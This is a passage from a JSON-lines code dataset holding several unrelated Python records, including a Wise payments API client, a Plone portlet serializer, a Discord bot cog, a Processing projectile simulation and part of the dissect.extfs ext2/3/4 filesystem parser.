headers={'Content-Type': 'application/json',\n 'Authorization': 'Bearer {}'.format(self.API_TOKEN)}, data=data)\n\n print(result)\n print(result.text)\n\n\n data = json.loads(result.text)\n\n self.customer_id = data['id']\n\n\n\n\n\n def create_transfer(self):\n\n import uuid\n\n order_number = self.order_type(self.order)\n\n\n\n data = {\n \"targetAccount\": self.customer_id,\n \"quoteUuid\": self.quote_id,\n \"customerTransactionId\": str(uuid.uuid4()),\n \"details\" : {\n \"reference\": order_number,\n \"transferPurpose\": \"verification.transfers.purpose.pay.bills\",\n \"sourceOfFunds\": \"verification.source.of.funds.other\"\n }\n }\n\n data = json.dumps(data)\n\n url = 'https://api.transferwise.com/v1/transfers'\n\n result = requests.post(url,\n headers={'Content-Type': 'application/json',\n 'Authorization': 'Bearer {}'.format(self.API_TOKEN)}, data=data)\n\n\n data = json.loads(result.text)\n\n print(result.text)\n\n self.transfer_id = data['id']\n\n\n\n def fund_transfer(self):\n\n data = {\n \"type\": \"BALANCE\"\n }\n\n data = json.dumps(data)\n\n\n url = 'https://api.transferwise.com/v3/profiles/' + str(self.profile) + '/transfers/'+ str(self.transfer_id) +'/payments'\n\n\n result = requests.post(url,\n headers={'Content-Type': 'application/json',\n 'Authorization': 'Bearer {}'.format(self.API_TOKEN)}, data=data)\n\n approval = result.headers['x-2fa-approval']\n\n key_file = open(\"private.pem\", \"rb\")\n key = key_file.read()\n key_file.close()\n\n pkey = crypto.load_privatekey(crypto.FILETYPE_PEM, key)\n\n\n dataBytes = bytes(approval, encoding='ascii')\n\n signData = OpenSSL.crypto.sign(pkey, dataBytes, \"sha256\")\n\n encodedData = base64.b64encode(signData)\n\n result = requests.post(url,\n headers={'Content-Type': 'application/json',\n 'Authorization': 'Bearer {}'.format(self.API_TOKEN),'x-2fa-approval': approval, 'X-Signature': encodedData}, data=data)\n\n\n print(result)\n print(result.text)\n print(result.headers)\n\n\n\n\n\n\n\n","repo_name":"ck381/MrSneaker","sub_path":"international_payments.py","file_name":"international_payments.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15984002712","text":"s1 = \"A aaaa bb c\"\ns2 = \"& aaa bbb c d\"\n\nd1 = {}\nd2 = {}\n\ndef alpha_count(s):\n d = {}\n for e in s:\n if e.isalpha() and e.islower():\n if e in d:\n d[e] = d[e] + 1\n else:\n d[e] = 1\n return d\n\ndef print_data(d):\n s = ''\n for e in d:\n if s != '':\n s = s + ', '\n s = s + str(d[e]) + \" '\" + e + \"'\"\n return s\n\nprint(\"s1 has \", print_data(alpha_count(s1)))\nprint(\"s2 has \", print_data(alpha_count(s2)))","repo_name":"aditya17aug/HackerRankCoding","sub_path":"codewars1.py","file_name":"codewars1.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11515713734","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport numpy as np\nx = np.linspace(0,5,11)\ny = x ** 2\n\n\n# In[2]:\n\n\nplt.plot(x,y,'r-')\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.title(\"X vs Y\")\nplt.show()\n\n\n# In[3]:\n\n\nplt.subplot(1,3,1)\nplt.plot(x,y,'r')\nplt.subplot(1,3,2)\nplt.plot(y,x,'b')\nplt.subplot(1,3,3)\nplt.plot(y,x ** .4,'g')\nplt.show()\n\n\n# In[4]:\n\n\nfig = plt.figure()\naxes = fig.add_axes([0.1,0.1,0.8,0.8])\naxes.set_xlabel(\"X 
Label\")\naxes.set_ylabel(\"Y Label\")\naxes.plot(x,y)\n\n\n# In[5]:\n\n\nfig = plt.figure()\naxes1 = fig.add_axes([0.1,0.1,0.8,0.8])\naxes2 = fig.add_axes([0.4,0.4,0.42,0.42])\naxes2.set_xlabel(\"X\")\naxes2.set_ylabel(\"Y\")\naxes1.plot()\naxes2.plot()\naxes1\n\n\n# In[12]:\n\n\nfig1,axes = plt.subplots(nrows = 1, ncols = 2)\naxes[0].plot(x,y)\naxes[1].plot(x,y)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ABPande/MyPythonRepo","sub_path":"Python/Basics/py_R3/Matplotlib.py","file_name":"Matplotlib.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3837458350","text":"# -*- coding: utf-8 -*-\n\"\"\" portlets init \"\"\"\n\nimport logging\nfrom plone import api\nfrom plone.app.portlets.interfaces import IPortletTypeInterface\nfrom plone.app.textfield.interfaces import IRichText\nfrom plone.memoize import forever\nfrom plone.portlets.interfaces import IPortletAssignment\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom plone.portlets.interfaces import IPortletManager\nfrom plone.portlets.interfaces import IPortletRetriever\nfrom plone.portlets.utils import hashPortletInfo\nfrom plone.restapi.interfaces import IFieldSerializer\nfrom plone.restapi.interfaces import ISerializeToJson\nfrom plone.restapi.interfaces import ISerializeToJsonSummary\nfrom plone.restapi.serializer.converters import json_compatible\nfrom plone.restapi.serializer.dxfields import DefaultFieldSerializer\nfrom ZODB.POSException import ConflictError\nfrom zope.component import adapter\nfrom zope.component import getMultiAdapter\nfrom zope.component import getUtilitiesFor\nfrom zope.component import queryMultiAdapter\nfrom zope.interface import implementer\nfrom zope.interface import Interface\nfrom zope.interface import providedBy\nfrom zope.publisher.interfaces import IRequest\nfrom zope.schema import getFields\nfrom zope.schema.interfaces import IField\n\n\n# import six\n\n\nlogger = logging.getLogger(__name__)\n\nSERVICE_ID = '@portlets'\n\n\n@implementer(ISerializeToJsonSummary)\n@adapter(IPortletManager, Interface, IRequest)\nclass PortletManagerSummarySerializer(object):\n \"\"\" Portlet manager summary serializer \"\"\"\n\n def __init__(self, manager, context, request):\n self.manager = manager\n self.context = context\n self.request = request\n\n def __call__(self):\n manager_id = self.manager.__name__\n\n content_url = self.context.absolute_url()\n url = '{0}/{1}/{2}'.format(content_url, SERVICE_ID, manager_id)\n\n return {\n '@id': url,\n 'manager': manager_id,\n }\n\n\n@implementer(ISerializeToJson)\n@adapter(IPortletManager, Interface, IRequest)\nclass PortletManagerSerializer(object):\n \"\"\" Portlet manager serializer \"\"\"\n\n def __init__(self, manager, context, request):\n self.manager = manager\n self.context = context\n self.request = request\n\n def filter(self, portlets):\n \"\"\" Check available of the assignment.\n We currently\n do not use the renderer, but\n this frequently have an available property too,\n hiding lists if they have no items.\n What can we do about that? Get hold of the renderer? 
\"\"\"\n filtered = []\n\n for p in portlets:\n try:\n if p['assignment'].available:\n filtered.append(p)\n except ConflictError:\n raise\n except Exception as e:\n logger.exception(\n 'Error while determining assignment availability of '\n 'portlet (%r %r %r): %s', p['category'], p['key'],\n p['name'], str(e))\n\n return filtered\n\n def __call__(self):\n result = {}\n\n manager_id = self.manager.__name__\n\n content_url = self.context.absolute_url()\n url = '{0}/{1}/{2}'.format(content_url, SERVICE_ID, manager_id)\n\n result = {\n '@id': url,\n 'manager': manager_id,\n 'portlets': [],\n }\n\n retriever = getMultiAdapter((self.context, self.manager),\n IPortletRetriever)\n # The retriever only returns portlets that are visible.\n # Still need to check available.\n\n # Based on\n # plone.portlets.manager.PortletManagerRenderer._lazyLoadPortlets\n\n for portlet in self.filter(retriever.getPortlets()):\n assignment = portlet['assignment']\n\n info = portlet.copy()\n info['manager'] = manager_id\n hashPortletInfo(info)\n\n assignment.__portlet_metadata__ = {\n 'key': portlet['key'],\n 'category': portlet['category'],\n 'name': portlet['name'],\n 'manager': manager_id,\n 'hash': info['hash'],\n }\n\n # To be able to customize serializers per portlet type, we try to\n # lookup for a named adapter first. The name is the portlet type\n\n # the serializer should ideally have the same discriminators\n # as the portlet renderer: context, request, view=service, manager,\n # data.\n type_ = get_portlet_info(assignment)[0]\n serializer = queryMultiAdapter(\n (assignment, self.context, self.request),\n ISerializeToJson,\n name=type_\n )\n\n if not serializer:\n serializer = queryMultiAdapter(\n (assignment, self.context, self.request),\n ISerializeToJson\n )\n\n if not serializer:\n logger.warn(\n 'No serializer for portlet (%r %r %r)',\n portlet['category'], portlet['key'], portlet['name'])\n\n continue\n\n portlet_json = serializer()\n\n if portlet_json:\n result['portlets'].append(portlet_json)\n return result\n\n\n@forever.memoize\ndef getPortletSchemata(): # noqa\n \"\"\" get portlet schemata \"\"\"\n return dict([(iface, name)\n for name, iface\n in getUtilitiesFor(IPortletTypeInterface)])\n\n\ndef get_portlet_info(assignment):\n \"\"\" Returns the portlet type (like portlet.Navigation) and schema\n \"\"\"\n\n # Adapted from\n # plone.app.portlets.exportimport.portlets._extractPortlets\n portlet_schemata = getPortletSchemata()\n type_ = None\n schema = None\n\n for schema in providedBy(assignment).flattened():\n type_ = portlet_schemata.get(schema, None)\n\n if type_ is not None:\n break\n\n return type_, schema\n\n\n@implementer(ISerializeToJson)\n@adapter(IPortletAssignment, Interface, IRequest)\nclass PortletSerializer(object):\n \"\"\" portlet serializer \"\"\"\n\n def __init__(self, assignment, context, request):\n self.assignment = assignment\n self.context = context\n self.request = request\n\n def __call__(self):\n\n if not getattr(self.assignment, '__portlet_metadata__', False):\n return None\n\n portlet_metadata = self.assignment.__portlet_metadata__\n\n content_url = self.context.absolute_url()\n url = '{0}/@portlets/{1}/{2}'.format(\n content_url,\n portlet_metadata['manager'],\n portlet_metadata['name'])\n\n phash = portlet_metadata['hash']\n\n if isinstance(phash, bytes):\n phash = phash.decode(\"utf8\")\n\n result = {\n '@id': url,\n 'portlet_id': portlet_metadata['name'],\n 'portlet_manager': portlet_metadata['manager'],\n 'portlet_category': portlet_metadata['category'],\n 
'portlet_key': portlet_metadata['key'],\n            'portlet_hash': phash,\n        }\n\n        type_, schema = get_portlet_info(self.assignment)\n\n        if type_ is not None:\n\n            type_filter = None\n\n            if 'type' in self.request.form.keys():\n                type_filter = self.request.form.get('type')\n\n                if not isinstance(type_filter, (list, tuple)):\n                    type_filter = [type_filter]\n\n            if type_filter and type_ not in type_filter:\n                return None\n\n            result['@type'] = type_\n            data = self.assignment.data\n\n            transformer_context = api.portal.get()\n\n            if portlet_metadata['category'] == 'context':\n                assignment_context_path = portlet_metadata['key']\n                assignment_context = self.context.unrestrictedTraverse(\n                    assignment_context_path)\n                transformer_context = assignment_context\n\n            for name, field in getFields(schema).items():\n                try:\n                    # todo: portlet schema permissions?\n                    serializer = queryMultiAdapter(\n                        (field, data, transformer_context, self.request),\n                        IFieldSerializer)\n                    value = serializer()\n                    result[json_compatible(name)] = value\n                except ConflictError:\n                    raise\n                except Exception as e:\n                    logger.exception(\n                        'Error while serializing '\n                        'portlet (%r %r %r), field %s: %s',\n                        portlet_metadata['category'],\n                        portlet_metadata['key'],\n                        portlet_metadata['name'],\n                        str(name),\n                        str(e))\n\n        return result\n\n\n# See serializer/dxfields.py: The portlet fields\n# need both the portlet data provider\n# as well as the context. So we extend the\n# default dexterity field serializers.\n\n\n@adapter(IField, IPortletDataProvider, Interface, Interface)\n@implementer(IFieldSerializer)\nclass DefaultPortletFieldSerializer(DefaultFieldSerializer):\n    \"\"\" default portlet field serializer \"\"\"\n\n    def __init__(self, field, portletdata, context, request):\n        self.field = field\n        self.portletdata = portletdata\n        self.context = context\n        self.request = request\n\n    def get_value(self, default=None):\n        \"\"\" get value \"\"\"\n        return getattr(self.field.interface(self.portletdata),\n                       self.field.__name__,\n                       default)\n\n\n@adapter(IRichText, IPortletDataProvider, Interface, Interface)\nclass RichttextPortletFieldSerializer(DefaultPortletFieldSerializer):\n    \"\"\" Rich text portlet field serializer \"\"\"\n    def __call__(self):\n        value = self.get_value()\n        # self.context is the transform context of the portlet:\n\n        return json_compatible(value, self.context)\n","repo_name":"eea/eea.restapi","sub_path":"src/eea/restapi/serializer/portlets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"35772589668","text":"# Initial position and velocity\np = PVector(10, 500)\nv = PVector(200, 0)\n# Gravity\ng = PVector(0, -9.8)\nf = 0.01 # drag force constant\n# Screen bounds\nxmin = 5\nxmax = 700\nymin = 0\nymax = 550\n\noldt = millis()/1000.0 # initial time\n\n\n\ndef setup():\n    size(800,800)\n    rectMode(CORNERS)\n    \ndef draw():\n    global oldt,p, v\n    # compute the drag force on body 1\n    F = v.copy()\n    F.mult(-f)\n    # total force on body 1\n    F.add(g)\n    # time elapsed since the last draw\n    t = millis()/1000.00\n    dt = t- oldt\n    oldt = t\n    # update the body position\n    dp = v.copy()\n    dp.mult(dt)\n    p.add(dp)\n    # velocity change (force * delta(t) / mass)\n    F.mult(dt)\n    # update the velocity\n    v.add(F)\n    \n    # collision check
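\n    # (each bounce below mirrors the overshoot back inside the box and flips that velocity component)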
\n    if p.x > xmax:\n        p.x = xmax - (p.x-xmax)\n        v.x = -v.x\n    if p.x < xmin:\n        p.x = xmin + (xmin - p.x)\n        v.x = -v.x\n    if p.y > ymax:\n        p.y = ymax - (p.y - ymax)\n        v.y = -v.y\n    if p.y < ymin:\n        p.y = ymin + (ymin - p.y)\n        v.y = -v.y\n    \n    \n    \n\n\n    \n    # draw the bodies\n    background(225)\n    fill(255,0,0)\n    ellipse(p.x, 600- p.y, 10, 10)\n    noFill()\n    strokeWeight(3)\n    stroke(0)\n    rect(xmin, 600 - ymax, xmax, 600 - ymin)\n    noStroke()","repo_name":"carolmcs/angrybirds","sub_path":"projetil_com_colisao/projetil_com_colisao.pyde","file_name":"projetil_com_colisao.pyde","file_ext":"pyde","file_size_in_byte":1335,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"1590415276","text":"import discord\nimport io\nfrom discord.ext import commands\nfrom PIL import Image\nimport sqlite3\nimport random\nimport json\nfrom discord import app_commands\nimport asyncio\n\nintents = discord.Intents.all()\nintents.messages = True\n\nbot = commands.Bot(command_prefix=\"/\", intents=intents)\n\n\nconnection = sqlite3.connect('viperdevmac.db')\nc = connection.cursor()\n\n\nclass allcharacters(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n\n\n    @bot.tree.command(name=\"allcharacters\", description=\"View all character records in the SpaceAddicts and Rontacklebox collections\")\n    async def allcharacters(self, interaction):\n        # Execute a SELECT statement to retrieve all names from the database\n        c.execute(\"SELECT name, 'Space Addicts' as source FROM spaceaddicts UNION SELECT name, 'Ron Tacklebox' as source FROM ront UNION SELECT name, 'Shop' as source FROM shop\")\n        results = c.fetchall()\n\n        # If results are found, create a list of names and send it to the user via an ephemeral message in the channel\n        if results:\n            # Format the results into a dictionary, where the key is the source and the value is a list of names from that source\n            formatted_results = {}\n            for name, source in results:\n                if source not in formatted_results:\n                    formatted_results[source] = []\n                formatted_results[source].append(name)\n\n            # Create a message with the formatted results\n            message = ''\n            for source, names in formatted_results.items():\n                message += f'\\n{source.upper()}:\\n' + '\\n'.join(names) + '\\n'\n\n            # Split the message into chunks of 2000 characters and send each chunk as an ephemeral message\n            chunks = [message[i:i+2000] for i in range(0, len(message), 2000)]
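\n            # Discord caps a single message at 2000 characters, hence the chunk size.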
\n            for i, chunk in enumerate(chunks):\n                embed = discord.Embed(title='Names in Databases', description=chunk, color=0x00ff00)\n                # An interaction allows only one initial response; any further\n                # chunks have to go through the follow-up webhook instead.\n                if i == 0:\n                    await interaction.response.send_message(embed=embed, ephemeral=True)\n                else:\n                    await interaction.followup.send(embed=embed, ephemeral=True)\n        else:\n            # If no results are found, send a message in the channel indicating that there are no names in the databases\n            embed = discord.Embed(title='Names in Databases', description='There are no names in the databases.', color=0xff0000)\n            await interaction.response.send_message(embed=embed, ephemeral=True)\n\n    \n    \n\nasync def setup(bot):\n    await bot.add_cog(allcharacters(bot))\n\n","repo_name":"Stratuscodelab/Yurrobot-V3-COG","sub_path":"cogs/allcharacters.py","file_name":"allcharacters.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20484154899","text":"import os\r\nimport shutil\r\n\r\n# Define the data deleter\r\ndef deldata(ininame,delnum):\r\n    load = open('%s.ini' %ininame,'r')\r\n    read = load.readlines()[10]\r\n    leno = len(str(read))\r\n    read = read.split(', ')\r\n    delnum = str(delnum)\r\n    delnum = delnum.replace('\\'', '')\r\n    read.remove(delnum)\r\n    write = read\r\n    lenth = len(write)\r\n    k = 0\r\n    delstr = ''\r\n    while k < lenth:\r\n        delstr = delstr + write[k] + ', '\r\n        k = k + 1\r\n    else:\r\n        delstr = delstr.rstrip(', ')\r\n    load.close()\r\n    load2nd = open('%s.ini' %ininame,'rb+')\r\n    load2nd.seek(-leno,2)\r\n    load2nd.truncate()\r\n    load2nd.close()\r\n    load3rd = open('%s.ini' %ininame,'r+')\r\n    load3rd.seek(0,2)\r\n    load3rd.write(delstr)\r\n    load3rd.close()","repo_name":"Ariczh/MoneySaver","sub_path":"parts/dele.py","file_name":"dele.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72733401437","text":"from setuptools import setup\nimport os\nimport re\n\n\nwith open(os.path.join(os.path.abspath(os.path.dirname(\n        __file__)), 'cbpi4ui', 'version.py'), 'r', encoding='latin1') as fp:\n    try:\n        match = re.search('.*\\\"(.*)\\\"', fp.readline())\n        version = match.group(1)\n    except IndexError:\n        raise RuntimeError('Unable to determine version.')\n\n\nprint(version)\n\nsetup(name='cbpi4ui',\n      version=version,\n      description='CraftBeerPi User Interface',\n      author='Manuel Fritsch',\n      author_email='manuel@craftbeerpi.com',\n      url='http://web.craftbeerpi.com',\n      include_package_data=True,\n      package_data={\n          # If any package contains *.txt or *.rst files, include them:\n          '': ['*.txt', '*.rst', '*.yaml'],\n          'cbpi4-ui-plugin': ['*','*.txt', '*.rst', '*.yaml']},\n      packages=['cbpi4ui'],\n      )\n","repo_name":"craftbeerpi/craftbeerpi4-ui","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"51"} +{"seq_id":"16184036565","text":"from __future__ import annotations\n\nimport io\nimport logging\nimport os\nimport stat\nfrom datetime import datetime\nfrom functools import lru_cache\nfrom typing import BinaryIO, Iterator, Optional, Union\nfrom uuid import UUID\n\nfrom dissect.cstruct import Instance\nfrom dissect.util import ts\nfrom dissect.util.stream import RangeStream, RunlistStream\n\nfrom dissect.extfs.c_ext import (\n    EXT2,\n    EXT3,\n    EXT4,\n    FILETYPES,\n    XATTR_NAME_MAP,\n    XATTR_PREFIX_MAP,\n    c_ext,\n)\nfrom dissect.extfs.exceptions import (\n    Error,\n    FileNotFoundError,\n    NotADirectoryError,\n    NotASymlinkError,\n)\nfrom dissect.extfs.journal import JDB2\n\nlog = logging.getLogger(__name__)\nlog.setLevel(os.getenv(\"DISSECT_LOG_EXTFS\", \"CRITICAL\"))\n\n\nclass ExtFS:\n    def __init__(self, fh: BinaryIO):\n        self.fh = fh\n        # self._path_cache = {}\n        self._journal = None\n\n        fh.seek(c_ext.EXT2_SBOFF)\n        sb = c_ext.ext4_super_block(fh)\n        self.sb = sb\n\n        if sb.s_magic != 
c_ext.EXT2_FS_MAGIC:\n raise Error(\"Not a valid ExtFS filesystem (magic mismatch)\")\n\n if sb.s_inodes_count < 10:\n raise Error(\"Not a valid ExtFS filesystem (inum count < 10)\")\n\n if sb.s_blocks_per_group == 0 or sb.s_inodes_per_group == 0:\n raise Error(\"Not a valid ExtFS filesystem (blocks or inodes per group is 0)\")\n\n if sb.s_log_block_size != sb.s_log_cluster_size:\n raise NotImplementedError(\"Different size cluster than blocks is currently not supported\")\n\n self.block_size = c_ext.EXT2_MIN_BLOCK_SIZE << sb.s_log_block_size\n if self.block_size == 0 or self.block_size % 512:\n raise Error(\"Not a valid ExtFS filesystem (invalid block size)\")\n\n if sb.s_feature_incompat & c_ext.EXT4_FEATURE_INCOMPAT_EXTENTS:\n self.type = EXT4\n elif sb.s_feature_compat & c_ext.EXT3_FEATURE_COMPAT_HAS_JOURNAL:\n self.type = EXT3\n else:\n self.type = EXT2\n\n if sb.s_feature_incompat & c_ext.EXT2_FEATURE_INCOMPAT_FILETYPE:\n self._dirtype = c_ext.ext2_dir_entry_2\n else:\n self._dirtype = c_ext.ext2_dir_entry\n\n self.block_count = (sb.s_blocks_count_hi << 32) | sb.s_blocks_count_lo\n self.last_block = self.block_count - 1\n\n if (\n self.type == EXT4\n and self.sb.s_feature_incompat & c_ext.EXT4_FEATURE_INCOMPAT_64BIT\n and self.sb.s_desc_size >= 64\n ):\n self._group_desc_struct = c_ext.ext4_group_desc\n else:\n self._group_desc_struct = c_ext.ext2_group_desc\n self._group_desc_size = sb.s_desc_size if sb.s_desc_size else len(self._group_desc_struct)\n\n goff = c_ext.EXT2_SBOFF + self._group_desc_size\n self.groups_offset = goff if goff % self.block_size == 0 else goff + self.block_size - goff % self.block_size\n self.groups_count = ((self.last_block - sb.s_first_data_block) // sb.s_blocks_per_group) + 1\n\n self.uuid = UUID(bytes=sb.s_uuid)\n self.last_mount = sb.s_last_mounted.split(b\"\\x00\")[0].decode(errors=\"surrogateescape\")\n\n self.root = self.get_inode(c_ext.EXT2_ROOT_INO, \"/\")\n\n self.get_inode = lru_cache(1024)(self.get_inode)\n self._read_group_desc = lru_cache(356)(self._read_group_desc)\n\n @property\n def journal(self) -> JDB2:\n if not self._journal:\n if not self.sb.s_feature_compat & c_ext.EXT3_FEATURE_COMPAT_HAS_JOURNAL:\n raise Error(\"Journal not supported\")\n\n inum = self.sb.s_journal_inum\n if inum == 0:\n raise Error(\n f\"Journal inum is 0, could be on external device (s_journal_uuid = {self.sb.s_journal_uuid})\"\n )\n\n inode = self.get_inode(inum)\n self._journal = JDB2(inode.open())\n\n return self._journal\n\n def get(self, path: Union[str, int], node: Optional[INode] = None) -> INode:\n if isinstance(path, int):\n return self.get_inode(path)\n\n node = node if node else self.root\n parts = path.split(\"/\")\n for part_num, part in enumerate(parts):\n if not part:\n continue\n\n while node.filetype == stat.S_IFLNK and part_num < len(parts):\n node = node.link_inode\n\n for entry in node.iterdir():\n if entry.filename == part:\n node = entry\n break\n else:\n raise FileNotFoundError(f\"File not found: {path}\")\n\n return node\n\n def get_inode(\n self,\n inum: int,\n filename: Optional[str] = None,\n filetype: Optional[int] = None,\n parent: Optional[INode] = None,\n lazy: bool = False,\n ) -> INode:\n if inum < c_ext.EXT2_BAD_INO or inum > self.sb.s_inodes_count:\n raise Error(f\"inum out of range {c_ext.EXT2_BAD_INO}-{self.sb.s_inodes_count}: {inum}\")\n\n inode = INode(self, inum, filename, filetype, parent=parent)\n if not lazy:\n inode._inode = inode._read_inode()\n\n return inode\n\n def _read_group_desc(self, group_num: int) -> Instance:\n 
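# A sketch of the lookup below (numbers hypothetical): with groups_offset=2048 and\n        # a 64-byte descriptor size, group 3 is read from byte offset 2048 + 3 * 64 = 2240.\n        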
if group_num >= self.groups_count:\n raise Error(\"Group number exceeds amount of groups\")\n\n offset = self.groups_offset + group_num * self._group_desc_size\n self.fh.seek(offset)\n group_desc = self._group_desc_struct(self.fh)\n\n if self._group_desc_struct == c_ext.ext4_group_desc:\n block_bitmap = (group_desc.bg_block_bitmap_hi << 32) | group_desc.bg_block_bitmap_lo\n inode_bitmap = (group_desc.bg_inode_bitmap_hi << 32) | group_desc.bg_inode_bitmap_lo\n table_block = (group_desc.bg_inode_table_hi << 32) | group_desc.bg_inode_table_lo\n else:\n block_bitmap = group_desc.bg_block_bitmap_lo\n inode_bitmap = group_desc.bg_inode_bitmap_lo\n table_block = group_desc.bg_inode_table_lo\n\n if block_bitmap > self.last_block or inode_bitmap > self.last_block or table_block > self.last_block:\n raise Error(\"Group descriptor block locations exceed last block\")\n\n return group_desc\n\n\nclass INode:\n def __init__(\n self,\n extfs: ExtFS,\n inum: int,\n filename: Optional[str] = None,\n filetype: Optional[int] = None,\n parent: Optional[INode] = None,\n ):\n self.extfs = extfs\n self.inum = inum\n self.parent = parent\n self._inode = None\n\n self.filename = filename\n self._filetype = filetype\n self._size = None\n self._link = None\n self._link_inode = None\n self._xattr = None\n\n self._dirlist = None\n self._runlist = None\n\n def __repr__(self) -> str:\n return f\"\"\n\n def _read_inode(self) -> Instance:\n block_group_num, index = divmod(self.inum - 1, self.extfs.sb.s_inodes_per_group)\n block_group = self.extfs._read_group_desc(block_group_num)\n\n if self.extfs._group_desc_struct == c_ext.ext4_group_desc:\n table_block = (block_group.bg_inode_table_hi << 32) | block_group.bg_inode_table_lo\n else:\n table_block = block_group.bg_inode_table_lo\n\n offset = table_block * self.extfs.block_size + index * self.extfs.sb.s_inode_size\n self.extfs.fh.seek(offset)\n return c_ext.ext4_inode(self.extfs.fh)\n\n @property\n def inode(self) -> Instance:\n if not self._inode:\n self._inode = self._read_inode()\n return self._inode\n\n @property\n def size(self) -> int:\n if not self._size:\n self._size = (self.inode.i_size_high << 32) + self.inode.i_size_lo\n return self._size\n\n @property\n def filetype(self) -> int:\n if not self._filetype:\n self._filetype = stat.S_IFMT(self.inode.i_mode)\n return self._filetype\n\n @property\n def link(self) -> str:\n if self.filetype != stat.S_IFLNK:\n raise NotASymlinkError(f\"{self!r} is not a symlink\")\n\n if not self._link:\n self._link = self.open().read().decode(errors=\"surrogateescape\")\n return self._link\n\n @property\n def link_inode(self) -> INode:\n if not self._link_inode:\n # Relative lookups work because . and .. 
are actual directory entries\n link = self.link\n if link.startswith(\"/\"):\n relnode = None\n else:\n relnode = self.parent\n self._link_inode = self.extfs.get(self.link, relnode)\n return self._link_inode\n\n @property\n def xattr(self) -> list[XAttr]:\n if not self._xattr:\n xattr = []\n\n if self.inode.i_extra.strip(b\"\\x00\"):\n buf = io.BytesIO(self.inode.i_extra)\n hdr = c_ext.ext4_xattr_ibody_header(buf)\n if hdr.h_magic != c_ext.EXT4_XATTR_MAGIC:\n raise Error(\"Invalid xattr magic value\")\n\n xattr.extend(_iter_xattr(self, buf, len(self.inode.i_extra), 4))\n\n if self.inode.i_file_acl_lo:\n block = (self.inode.i_file_acl_high << 32) | self.inode.i_file_acl_lo\n block_offset = block * self.extfs.block_size\n\n buf = RangeStream(self.extfs.fh, block_offset, self.extfs.block_size)\n hdr = c_ext.ext4_xattr_header(buf)\n if hdr.h_magic != c_ext.EXT4_XATTR_MAGIC:\n raise Error(\"Invalid xattr magic value\")\n\n xattr.extend(_iter_xattr(self, buf, buf.size))\n\n self._xattr = xattr\n return self._xattr\n\n @property\n def atime(self) -> datetime:\n return ts.from_unix_ns(self.atime_ns)\n\n @property\n def atime_ns(self) -> int:\n time = self.inode.i_atime\n time_extra = self.inode.i_atime_extra if self.extfs.sb.s_inode_size > 128 else 0\n\n return _parse_ns_ts(time, time_extra)\n\n @property\n def mtime(self) -> datetime:\n return ts.from_unix_ns(self.mtime_ns)\n\n @property\n def mtime_ns(self) -> int:\n time = self.inode.i_mtime\n time_extra = self.inode.i_mtime_extra if self.extfs.sb.s_inode_size > 128 else 0\n\n return _parse_ns_ts(time, time_extra)\n\n @property\n def ctime(self) -> datetime:\n return ts.from_unix_ns(self.ctime_ns)\n\n @property\n def ctime_ns(self) -> int:\n time = self.inode.i_ctime\n time_extra = self.inode.i_ctime_extra if self.extfs.sb.s_inode_size > 128 else 0\n\n return _parse_ns_ts(time, time_extra)\n\n @property\n def dtime(self) -> datetime:\n return ts.from_unix(self.inode.i_dtime)\n\n @property\n def crtime(self) -> Optional[datetime]:\n time_ns = self.crtime_ns\n if time_ns is None:\n return None\n return ts.from_unix_ns(time_ns)\n\n @property\n def crtime_ns(self) -> Optional[int]:\n if self.extfs.sb.s_inode_size <= 128:\n return None\n\n time = self.inode.i_crtime\n time_extra = self.inode.i_crtime_extra\n\n return _parse_ns_ts(time, time_extra)\n\n def listdir(self) -> dict[str, INode]:\n if not self._dirlist:\n self._dirlist = {node.filename: node for node in self.iterdir()}\n return self._dirlist\n\n dirlist = listdir\n\n def iterdir(self) -> Iterator[INode]:\n if self.filetype != stat.S_IFDIR:\n raise NotADirectoryError(f\"{self!r} is not a directory\")\n\n buf = self.open()\n offset = 0\n\n while offset < self.size - 12:\n direntry = self.extfs._dirtype(buf)\n\n if direntry.rec_len == 0:\n log.critical(\"Zero-length directory entry in %s (offset 0x%x)\", self, offset)\n return\n\n # Sanity check if the direntry is valid\n if 0 < direntry.inode < self.extfs.sb.s_inodes_count:\n fname = buf.read(direntry.name_len).decode(errors=\"surrogateescape\")\n ftype = direntry.file_type if self.extfs._dirtype == c_ext.ext2_dir_entry_2 else None\n\n if ftype:\n ftype = FILETYPES[ftype]\n\n yield self.extfs.get_inode(direntry.inode, fname, ftype, parent=self, lazy=True)\n\n offset += direntry.rec_len\n buf.seek(offset)\n\n def dataruns(self) -> list[tuple[Optional[int], int]]:\n if not self._runlist:\n expected_runs = (self.size + self.extfs.block_size - 1) // self.extfs.block_size\n\n if self.inode.i_flags & c_ext.EXT4_EXTENTS_FL:\n buf = 
